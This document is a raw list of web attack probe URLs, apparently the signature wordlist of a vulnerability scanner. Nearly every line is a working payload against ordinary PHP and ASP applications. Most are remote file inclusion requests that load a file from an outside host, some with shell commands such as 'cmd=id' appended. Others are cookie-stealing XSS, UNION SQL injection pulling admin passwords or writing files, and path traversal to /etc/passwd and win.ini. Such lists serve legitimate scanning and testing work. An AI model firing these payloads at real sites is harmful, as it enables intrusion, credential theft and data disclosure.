iissamples/exair/howitworks/codebrws.asp
iissamples/issamples/SQLQHit.asp
iissamples/issamples/Winmsdp.exe
iissamples/issamples/codebrws.asp
iissamples/issamples/ixqlang.htm
iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full
iissamples/issamples/sqlqhit.asp
iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/Winmsdp.exe
iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
iissamples/sdk/asp/docs/codebrws.asp
image.php?url=http://www.yxlink.com/nvs_test.txt???
image/
images/
images/?pattern=/etc/*&sort=name
imcws/axis2-admin/axis2-admin/axis2-web/axis2-admin/axis2-admin/engagingglobally?submit=%2bEngage%2b&modules=<script>alert(1)</script>
img/main.cgi?next_file=%3Cimg%20src%3dx%20onerror%3dalert(1)%3E
imp/horde/test.php
imp/horde/test.php?mode=phpinfo
imp/mailbox.php3?actionID=6&server=x&imapuser=x';somesql+--&pass=x
impex/ImpExData.php?systempath=http://www.yxlink.com/nvs_test.txt
import.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
importinfo.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
in.php?returnpath=http://www.yxlink.com/nvs_test.txt
inc.php?url_index=http://www.yxlink.com/nvs_test.txt
inc/articles.inc.php?GLOBALS[CHEMINMODULES]=http://www.yxlink.com/nvs_test.txt
inc/cmses/aedating4CMS.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
inc/cmses/aedatingCMS.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
inc/cmses/aedatingCMS2.php?dir[inc]=http://www.yxlink.com/nvs_test.txt
inc/config.inc.php?x[1]=http://www.yxlink.com/nvs_test.txt
inc/design.inc.php?dir[data]=http://www.yxlink.com/nvs_test.txt
inc/download_center_lite.inc.php?script_root=http://www.yxlink.com/nvs_test.txt
inc/extensions.php?mode=extensions&ext=\x22><script>alert(333)</script>
inc/formmail.inc.php?script_root=http://www.yxlink.com/nvs_test.txt
inc/gabarits.php?cfg_racine=http://www.yxlink.com/nvs_test.txt
inc/header.inc.php?ficStyle=http://www.yxlink.com/nvs_test.txt
inc/ifunctions.php?GLOBALS[phpQRootDir]=http://www.yxlink.com/nvs_test.txt
inc/inc.php?cfg_racine=http://www.yxlink.com/nvs_test.txt?
inc/indexhead.php?fileloc=http://www.yxlink.com/nvs_test.txt?
inc/irayofuncs.php?irayodirhack=http://www.yxlink.com/nvs_test.txt
inc/libs/Smarty_Compiler.class.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.display_debug_console.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.load_plugins.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.load_resource_plugin.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.process_cached_inserts.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.process_compiled_include.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/libs/core/core.read_cache_file.php?plugin_file=http://www.yxlink.com/nvs_test.txt?
inc/linkbar.php?cfile=http://www.yxlink.com/nvs_test.txt?
inc/login.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/logingecon.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/ltdialogo.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/mtdialogo.php?pathCGX=http://www.yxlink.com/nvs_test.txt
inc/nuke_include.php?newsSync_enable_phpnuke_mod=1&newsSync_NUKE_PATH=http://www.yxlink.com/nvs_test.txt?
inc/prepend.inc.php?path=http://www.yxlink.com/nvs_test.txt?
inc/sendmail.inc
inc/service.alert.inc.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
inc/settings.php?inc_dir=http://www.yxlink.com/nvs_test.txt
inc/settings.ses.php?SPL_CFG[dirroot]=http://www.yxlink.com/nvs_test.txt?
inc/shows.inc.php?cutepath=http://www.yxlink.com/nvs_test.txt?
inc/sige_init.php?SYS_PATH=http://www.yxlink.com/nvs_test.txt?
inc2.php?url_index=http://www.yxlink.com/nvs_test.txt
inc_group.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_manager.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_newgroup.php.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_smb_conf.php?include_path=http://www.yxlink.com/nvs_test.txt
inc_user.php?include_path=http://www.yxlink.com/nvs_test.txt
include.php?_APP_RELATIVE_PATH=http://www.yxlink.com/nvs_test.txt
include.php?file=atk/popups/colorpicker.inc&field=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
include.php?gorumDir=http://www.yxlink.com/nvs_test.txt
include.php?myng_root=http://www.yxlink.com/nvs_test.txt
include.php?path=contact.php&contact_email=\x5C\x22>&lt;script&gt;alert(document.cookie);&lt;/script&gt;
include.php?path=psp/user.php&site=http://www.yxlink.com/nvs_test.txt
include.php?path[docroot]=http://www.yxlink.com/nvs_test.txt
include.php?sunPath=http://www.yxlink.com/nvs_test.txt
include/
include/Beautifier/Core.php?BEAUT_PATH=http://www.yxlink.com/nvs_test.txt
include/HTML_oben.php?include_path=http://www.yxlink.com/nvs_test.txt
include/SQuery/gameSpy2.php?libpath=http://www.yxlink.com/nvs_test.txt
include/bbs.lib.inc.php?site_path=http://www.yxlink.com/nvs_test.txt
include/class_yapbbcooker.php?cfgIncludeDirectory=http://www.yxlink.com/nvs_test.txt
include/classes.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt?
include/client.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt? 
include/cls_headline_prod.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
include/cls_listorders.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
include/cls_viewpastorders.php?INCLUDE_PATH=http://www.yxlink.com/nvs_test.txt
include/common.php?XOOPS_ROOT_PATH=http://www.yxlink.com/nvs_test.txt
include/common_functions.php?baros_path=http://www.yxlink.com/nvs_test.txt?
include/config.inc.php?racine=http://www.yxlink.com/nvs_test.txt
include/config_settings.php?config[include_path]=http://www.yxlink.com/nvs_test.txt
include/copyright.php?tsep_config[absPath]=http://www.yxlink.com/nvs_test.txt?cmd=ls
include/customize.php?l=http://www.yxlink.com/nvs_test.txt&text=Hello%20World
include/customize.php?l=http://www.yxlink.com/nvs_test.txt&text=Hello%20World 
include/default_header.php?script_path=http://www.yxlink.com/nvs_test.txt
include/define.php?INC_DIR=http://www.yxlink.com/nvs_test.txt?
include/disp_form.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/disp_smileys.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/dom.php?path=http://www.yxlink.com/nvs_test.txt
include/dtd.php?path=http://www.yxlink.com/nvs_test.txt
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=http://www.yxlink.com/nvs_test.txt?
include/engine/content/elements/menu.php?CONFIG[AdminPath]=http://www.yxlink.com/nvs_test.txt
include/forms.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt?
include/global.php?pfad=http://www.yxlink.com/nvs_test.txt
include/header.php?cs_base_path=http://www.yxlink.com/nvs_test.txt?
include/help.php?base=http://www.yxlink.com/nvs_test.txt
include/html/nettools.popup.php?DIR=http://www.yxlink.com/nvs_test.txt
include/inc.foot.php?root=http://www.yxlink.com/nvs_test.txt
include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.yxlink.com/nvs_test.txt
include/inc_freigabe.php?include_path=http://www.yxlink.com/nvs_test.txt
include/inc_freigabe1.php?include_path=http://www.yxlink.com/nvs_test.txt
include/inc_freigabe3.php?include_path=http://www.yxlink.com/nvs_test.txt
include/include_stream.inc.php?include_path=http://www.yxlink.com/nvs_test.txt
include/include_top.php?g_include=http://www.yxlink.com/nvs_test.txt
include/includes.php?include_path=http://www.yxlink.com/nvs_test.txt
include/index.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/init.inc.php?G_PATH=http://www.yxlink.com/nvs_test.txt
include/issue_edit.php?INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt?
include/jump.php?gurl=%23\x22</script><script>alert(/123/)</script>/*
include/lib/lib_slots.php?main_path=http://www.yxlink.com/nvs_test.txt
include/lib/lib_stats.php?main_path=http://www.yxlink.com/nvs_test.txt?
include/lib/lib_users.php?main_path=http://www.yxlink.com/nvs_test.txt?
include/listall.inc.php?mysqlcall=http://www.yxlink.com/nvs_test.txt
include/little_news.php3?cfg_include_dir=http://www.yxlink.com/nvs_test.txt?
include/livre_include.php?no_connect=lol&chem_absolu=http://www.yxlink.com/nvs_test.txt?
include/loading.php?path_include=http://www.yxlink.com/nvs_test.txt
include/mail.inc.php?root=http://www.yxlink.com/nvs_test.txt
include/menu_builder.php?config[page_dir]=http://www.yxlink.com/nvs_test.txt?
include/misc/mod_2checkout/2checkout_return.inc.php?DIR=http://www.yxlink.com/nvs_test.txt
include/monitoring/engine/MakeXML.php?fileOreonConf=http://www.yxlink.com/nvs_test.txt?
include/parser.php?path=http://www.yxlink.com/nvs_test.txt
include/pear/IT.php?basepath=http://www.yxlink.com/nvs_test.txt
include/pear/ITX.php?basepath=http://www.yxlink.com/nvs_test.txt
include/pear/IT_Error.php?basepath=http://www.yxlink.com/nvs_test.txt
include/phpxd/phpXD.php?appconf[rootpath]=http://www.yxlink.com/nvs_test.txt?&cmd=id
include/prodler.class.php?sPath=http://www.yxlink.com/nvs_test.txt???
include/rootGui.inc.php?header=http://www.yxlink.com/nvs_test.txt
include/scripts/export_batch.inc.php?DIR=http://www.yxlink.com/nvs_test.txt
include/scripts/run_auto_suspend.cron.php?DIR=http://www.yxlink.com/nvs_test.txt
include/scripts/send_email_cache.php?DIR=http://www.yxlink.com/nvs_test.txt
include/startup.inc.php?root_path=http://www.yxlink.com/nvs_test.txt?
include/themes/themefunc.php?myNewsConf[path][sys][index]=http://www.yxlink.com/nvs_test.txt?
include/thumb.php?x=1&y=/../../../config&dir=config_db.php
include/timesheet.php?config[include_dir]=http://www.yxlink.com/nvs_test.txt
include/top_graph_header.php?config[library_path]=http://www.yxlink.com/nvs_test.txt
include/urights.php?CRM_inc=http://www.yxlink.com/nvs_test.txt
includes/adminAttachments.php?GlobalSettings[templatesDirectory]=@RFIUR
includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminBanned.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminBoards.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminPolls.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/adminSensored.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/admin_board2.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/admin_logger.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://www.yxlink.com/nvs_test.txt?
includes/adovbs.inc
includes/ajax_listado.php?urlModulo=http://www.yxlink.com/nvs_test.txt
includes/archive/archive_topic.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/bbcb_mg.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/begin.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/blogger.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/class/class_tpl.php?cache_file=http://www.yxlink.com/nvs_test.txt?
includes/class_block.php?file=http://www.yxlink.com/nvs_test.txt
includes/class_humanverify.php?chosenlib=http://www.yxlink.com/nvs_test.txt
includes/class_paid_subscription.php?methodinfo[classname]=http://www.yxlink.com/nvs_test.txt
includes/class_template.php?quezza_root_path=http://www.yxlink.com/nvs_test.txt
includes/classes/pctemplate.php?pcConfig[smartyPath]=http://www.yxlink.com/nvs_test.txt?cmd
includes/common.inc.php?CONFIG[BASE_PATH]=http://www.yxlink.com/nvs_test.txt
includes/common.php?module_root_path=http://www.yxlink.com/nvs_test.txt?
includes/common.php?root=http://www.yxlink.com/nvs_test.txt?
includes/common.php?root=http://www.yxlink.com/nvs_test.txt??
includes/common.php?root_path=http://www.yxlink.com/nvs_test.txt
includes/config.inc.php?racineTBS=http://www.yxlink.com/nvs_test.txt
includes/config/master.inc.php?fm_data[root]=http://www.yxlink.com/nvs_test.txt
includes/connection.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/db_adodb.php?baseDir=http://www.yxlink.com/nvs_test.txt
includes/db_connect.php?baseDir=http://www.yxlink.com/nvs_test.txt
includes/dbal.php?eqdkp_root_path=http://www.yxlink.com/nvs_test.txt
includes/events.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/footer.html.inc.php?tc_config[app_root]=http://www.yxlink.com/nvs_test.txt?
includes/footer.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/footer.php3?my_footer=http://www.yxlink.com/nvs_test.txt
includes/footer.php?PHPGREETZ_INCLUDE_DIR=http://www.yxlink.com/nvs_test.txt
includes/functions.inc.php?sitepath=http://www.yxlink.com/nvs_test.txt?
includes/functions.php?classfile=http://www.yxlink.com/nvs_test.txt
includes/functions.php?location=http://www.yxlink.com/nvs_test.txt
includes/functions.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions/auto_email_notify.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/functions/html_generate.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/functions/master.inc.php?fm_data[root]=http://www.yxlink.com/nvs_test.txt
includes/functions/validations.php?path_prefix=http://www.yxlink.com/nvs_test.txt
includes/functions_admin.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/functions_cms.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions_install.php?vwar_root=http://www.yxlink.com/nvs_test.txt
includes/functions_kb.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions_mod_user.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/functions_portal.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/functions_user_viewed_posts.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/global.php?nbs=http://www.yxlink.com/nvs_test.txt?
includes/header.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/header.inc.php?dateiPfad=http://www.yxlink.com/nvs_test.txt
includes/header.php3?my_header=http://www.yxlink.com/nvs_test.txt
includes/include_once.php?include_file=http://www.yxlink.com/nvs_test.txt
includes/init.php?includepath=http://www.yxlink.com/nvs_test.txt?
includes/iplogger.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/kb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
includes/kb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt?cmd=ls
includes/lang/language.php?path_to_root=http://www.yxlink.com/nvs_test.txt
includes/lib-account.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-group.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-log.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-mydb.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-template-mod.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/lib-themes.inc.php?CONF_CONFIG_PATH=http://www.yxlink.com/nvs_test.txt?
includes/logger_engine.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/menuleft.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/mkb.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?ls
includes/morcegoCMS/adodb/adodb.inc.php?path=http://www.yxlink.com/nvs_test.txt
includes/morcegoCMS/morcegoCMS.php?fichero=http://www.yxlink.com/nvs_test.txt
includes/move.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/mx_common.php?module_root_path=http://www.yxlink.com/nvs_test.txt?
includes/openid/Auth/OpenID/BBStore.php?openid_root_path=http://www.yxlink.com/nvs_test.txt
includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://www.yxlink.com/nvs_test.txt
includes/pafiledb_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt
includes/pages.inc.php?PagePrefix=http://www.yxlink.com/nvs_test.txt
includes/phpdig/includes/config.php?relative_script_path=http://www.yxlink.com/nvs_test.txt
includes/pm_popup.php?u1=[XSS]&m1=\x22><script>alert(333)</script>&m2=&m3=[XSS]&m4=[XSS]
includes/poll.php?GlobalSettings[templatesDirectory]=http://www.yxlink.com/nvs_test.txt
includes/profilcp_constants.php?module_root_path=http://www.yxlink.com/nvs_test.txt?
includes/session.php?baseDir=http://www.yxlink.com/nvs_test.txt
includes/settings.inc.php?approot=http://www.yxlink.com/nvs_test.txt
includes/template.php?myevent_path=http://www.yxlink.com/nvs_test.txt
includes/themen_portal_mitte.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt
includes/tumbnail.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?
includes/usercp_register.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/usercp_viewprofile.php?phpbb_root_path=http://www.yxlink.com/nvs_test.txt?
includes/xhtml.php?d_root=http://www.yxlink.com/nvs_test.txt
includes/xhtml.php?d_root=http://www.yxlink.com/nvs_test.txt?
index
index.asp?inc='><script>alert(222)</script>
index.asp?inc=forumread&article='><script>alert(333)</script>
index.asp?inc=profile&searchtext='><script>alert(333)</script>
index.cgi?action=browse&host=localhost&num=99999%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E
index.html%20
index.html~
index.inc.php?PATH_Includes=http://www.yxlink.com/nvs_test.txt
index.js0x70
index.php/123
index.php/>\x22><ScRiPt>alert(2222)</ScRiPt>
index.php/\x22><script>alert(666)</script>
index.php/\x5C\x22><script><script>alert(document.cookie)</script><
index.php/content/advancedsearch/?SearchText=<script>alert(document.cookie)</script>&PhraseSearchText=<script>alert(document.cookie)</script>&SearchContentClassID=-1&SearchSectionID=-1&SearchDate=-1&SearchButton=Search
index.php/content/search/?SectionID=3&SearchText=<script>alert(document.cookie)</script>
index.php/list-1%20and%201=1.html
index.php/list-1%20and%201=2.html
index.php/page-4 union all select 1,2,3,4,md5(333),adminpass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 from kc_admin-100.html
index.php/tools-staticPage.html?filename=../../../../../../../../../../etc/passwd
index.php/weblinks-categories?id=0%20%29%20union%20select%20md5(333)%20from%20%60k59cv_users%60%20--%20%29
index.php3?Application_Root=http://www.yxlink.com/nvs_test.txt
index.php?1=lol&PAGES[lol]=http://www.yxlink.com/nvs_test.txt
index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
index.php?AML_opensite=http://www.yxlink.com/nvs_test.txt
index.php?AMV_openconfig=1&AMV_serverpath=http://www.yxlink.com/nvs_test.txt
index.php?CID=1 '
index.php?CONFIG[MWCHAT_Libs]=http://www.yxlink.com/nvs_test.txt?
index.php?ConfigDir=http://www.yxlink.com/nvs_test.txt
index.php?DIR_PLUGINS=http://www.yxlink.com/nvs_test.txt
index.php?G_JGALL[inc_path]=http://www.yxlink.com/nvs_test.txt%00
index.php?HomeDir=http://www.yxlink.com/nvs_test.txt
index.php?Lang=AR&Page=http://www.yxlink.com/nvs_test.txt
index.php?Madoa=http://www.yxlink.com/nvs_test.txt?
index.php?RP_PATH=http://www.yxlink.com/nvs_test.txt
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid=1&GLOBALS=&mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.yxlink.com/nvs_test.txt
index.php?_m=mod_auth&_a=auth_callback&type=../../robots.txt%00
index.php?a=day_view&date=%22%20onmouseover=%22javascript:alert%281111%29%22
index.php?abg_path=http://www.yxlink.com/nvs_test.txt?
index.php?abs_path=http://www.yxlink.com/nvs_test.txt
index.php?ac=search&at=list&att[a]=nvs
index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,md5(333333),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20information_schema.tables;%23
index.php?ac=search&at=taglist&tagkey=%2527,tags)%20or(select%201%20from(select%20count(*),concat((select%20(select%20concat(0x7e,0x27,table_name,0x27,0x7e))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23
index.php?act=Question&id=1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E
index.php?act=task&ck='
index.php?action=DetailView&module=Calendar&record=116&activity_mode=Task%22%20%20style=%22background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%22%20x=%22XSSSSSSSS&parenttab=My
index.php?action=DetailView&module=Leads&record=%3Cscript%3Ealert(1111)%3C/script%3E
index.php?action=ListView&module=Calendar&record=116&viewname=19&start=1371b1\x22%20onmouseover=\x22alert(0)\x22%20a%3db%22&parenttab=My%20Home%20Page
index.php?action=index&module=Calendar&view=week&hour=0&day=5%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x
index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9%27%29%22%20%20onmouseover%3d%22alert%28/XSS/)%22%20x=%22&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview%27%29%22%20%20onload%3d%22alert%28/XSS/%29%22%20x=%22&subtab=event&parenttab=My&onlyforuser=1
index.php?action=index&module=Calendar&view=week&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event%27%20onmouseover%3d%27javascript:alert%28/XSS/%29%27%20x=%27&parenttab=My&onlyforuser=1
index.php?action=index&module=Calendar&view=week'%20onload%3d%22alert%28/XSS/)%22%20x=%22&hour=0&day=5&month=9&year=2010&viewOption=listview&subtab=event&parenttab=My&onlyforuser=1
index.php?action=search&searchFor=\x5C\x22><script>alert('Vulnerable')</script >
index.php?action=storenew&username=<script>alert('Vulnerable')</script>
index.php?action=view&view=category&catid=-1%20UNION%20SELECT%20null,null,md5(333),null,null,null,null,null%20FROM%20arkidb_users%20WHERE%20id=1&catflag=1&sublevel=1
index.php?adduser=true&lang=http://www.yxlink.com/nvs_test.txt
index.php?adodb=http://www.yxlink.com/nvs_test.txt
index.php?ads_file=http://www.yxlink.com/nvs_test.txt
index.php?app=article&ac=admin/post&ts=list
index.php?app=widget&mod=Category&act=getChild&model_name=Schedule&method=runSchedule&id[task_to_run]=addons/Area)->getAreaList();phpinfo();%23
index.php?arquivo=http://www.yxlink.com/nvs_test.txt
index.php?back=http://www.yxlink.com/nvs_test.txt
index.php?base==http://www.yxlink.com/nvs_test.txt
index.php?basePath=http://www.yxlink.com/nvs_test.txt
index.php?bibtexrootrel=http://www.yxlink.com/nvs_test.txt?
index.php?blog_dc_path=http://www.yxlink.com/nvs_test.txt
index.php?blog_theme=http://www.yxlink.com/nvs_test.txt
index.php?body=http://www.yxlink.com/nvs_test.txt
index.php?c=2-2%20UNION%20ALL%20SELECT%202,md5(333)%20||%20password,%203,4,5,6%20FROM%20login%20limit%201%20--%20x
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='
index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>
index.php?c=ueditor&f=remote_image&upfile=http://www.yxlink.com/nvs_test.txt?.php
index.php?catid=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php?chemin=..%2F..%2F..%2F..%2F..%2F..%2F..%2F%2Fetc
index.php?class_path=http://www.yxlink.com/nvs_test.txt?
index.php?classified_path=http://www.yxlink.com/nvs_test.txt?
index.php?cms=http://www.yxlink.com/nvs_test.txt?
index.php?comment-2'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/md5(333))))/**/order/**/by/**/'1-ask-commentlist.html
index.php?config=1&base_datapath=http://www.yxlink.com/nvs_test.txt
index.php?configFile=http://www.yxlink.com/nvs_test.txt
index.php?config[\x5C\x22sipssys\x5C\x22]=http://www.yxlink.com/nvs_test.txt
index.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?&cmd=id
index.php?config[root_ordner]=http://www.yxlink.com/nvs_test.txt?cmd=id
index.php?config_atkroot=http://www.yxlink.com/nvs_test.txt
index.php?configuration=http://www.yxlink.com/nvs_test.txt
index.php?content=showrecipe&id=-3%20union%20select%20md5(12345678901),2,3,4,5--
index.php?content=showrecipe&id=-3%20union%20select%20md5(333),2,3,4,5--
index.php?custom_admin_path=http://www.yxlink.com/nvs_test.txt?
index.php?dateiPfad=http://www.yxlink.com/nvs_test.txt?&cmd=ls
index.php?de=http://www.yxlink.com/nvs_test.txt
index.php?default_path=http://www.yxlink.com/nvs_test.txt
index.php?dept=http://www.yxlink.com/nvs_test.txt
index.php?dir=<script>alert('Vulnerable')</script>
index.php?do=http://www.yxlink.com/nvs_test.txt
index.php?doc=unote&id=%27
index.php?download=/etc/passwd
index.php?download=/windows/win.ini
index.php?download=/winnt/win.ini
index.php?err=3&email=\x5C\x22><script>alert(document.cookie)</script>
index.php?exec=http://www.yxlink.com/nvs_test.txt?
index.php?ext=http://www.yxlink.com/nvs_test.txt
index.php?faq_path=http://www.yxlink.com/nvs_test.txt?&cmd=id
index.php?file=Liens&op=\x5C\x22><script>alert('Vulnerable');</script>
index.php?file=Liens&op=phpinfo
index.php?file=index.php
index.php?file_name[]=http://www.yxlink.com/nvs_test.txt?
index.php?file_path=http://www.yxlink.com/nvs_test.txt
index.php?file_path=http://www.yxlink.com/nvs_test.txt?
index.php?fileloc=http://www.yxlink.com/nvs_test.txt
index.php?from=http://www.yxlink.com/nvs_test.txt
index.php?func=http://www.yxlink.com/nvs_test.txt
index.php?func=http://www.yxlink.com/nvs_test.txt?
index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,md5(333),0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*
index.php?function=custom&custom=http://www.yxlink.com/nvs_test.txt
index.php?function=http://www.yxlink.com/nvs_test.txt
index.php?gOo=http://www.yxlink.com/nvs_test.txt
index.php?gen=http://www.yxlink.com/nvs_test.txt
index.php?get=http://www.yxlink.com/nvs_test.txt
index.php?home_name=http://www.yxlink.com/nvs_test.txt
index.php?id=-1 UNION SELECT 1,2,3,MD5(333)
index.php?id=-1 UNION%20SELECT%20md5(333),md5(333),md5(333),md5(333)
index.php?id=http://www.yxlink.com/nvs_test.txt
index.php?ilang=http://www.yxlink.com/nvs_test.txt?
index.php?inc=http://www.yxlink.com/nvs_test.txt
index.php?inc_dir=http://www.yxlink.com/nvs_test.txt
index.php?includeDir=http://www.yxlink.com/nvs_test.txt
index.php?includeFooter=http://www.yxlink.com/nvs_test.txt
index.php?include_location=http://www.yxlink.com/nvs_test.txt
index.php?includesdir=http://www.yxlink.com/nvs_test.txt
index.php?ind=',userid='1
index.php?insPath=http://www.yxlink.com/nvs_test.txt
index.php?lang=http://www.yxlink.com/nvs_test.txt
index.php?language=en&main_page=http://www.yxlink.com/nvs_test.txt
index.php?language=http://www.yxlink.com/nvs_test.txt?
index.php?libDir=http://www.yxlink.com/nvs_test.txt
index.php?lizge=http://www.yxlink.com/nvs_test.txt?&cmd=ls
index.php?lng=http://www.yxlink.com/nvs_test.txt
index.php?load=http://www.yxlink.com/nvs_test.txt
index.php?loadpage=http://www.yxlink.com/nvs_test.txt
index.php?m=contacts&a=addedit&contact_id=0&company_id=1&company_name=%22%20onmouseover=%22javascript:alert%281111%29%22
index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20md5(333),2,3,4,5,6,7,8, 9,10,11%20INTO%20OUTFILE%20%27file.txt%27%20--%202
index.php?m=contacts&search_string=0%27%29%20UNION%20SELECT%20md5(333),2,3,4,5,6,7,8,9,10,11--
index.php?m=contacts&where=%27%29%20UNION%20SELECT%20md5(333),2,3,4,5,6,7,8,9,10,11--
index.php?m=departments&dept_id=%27%20UNION%20SELECT%20md5(333)%20INTO%20OUTFILE% 20%27/tmp/file.txt%27%20--%202
index.php?m=departments&dept_id=%27%20UNION%20SELECT%20md5(333)--
index.php?m=member&c=index&a=register&siteid=1
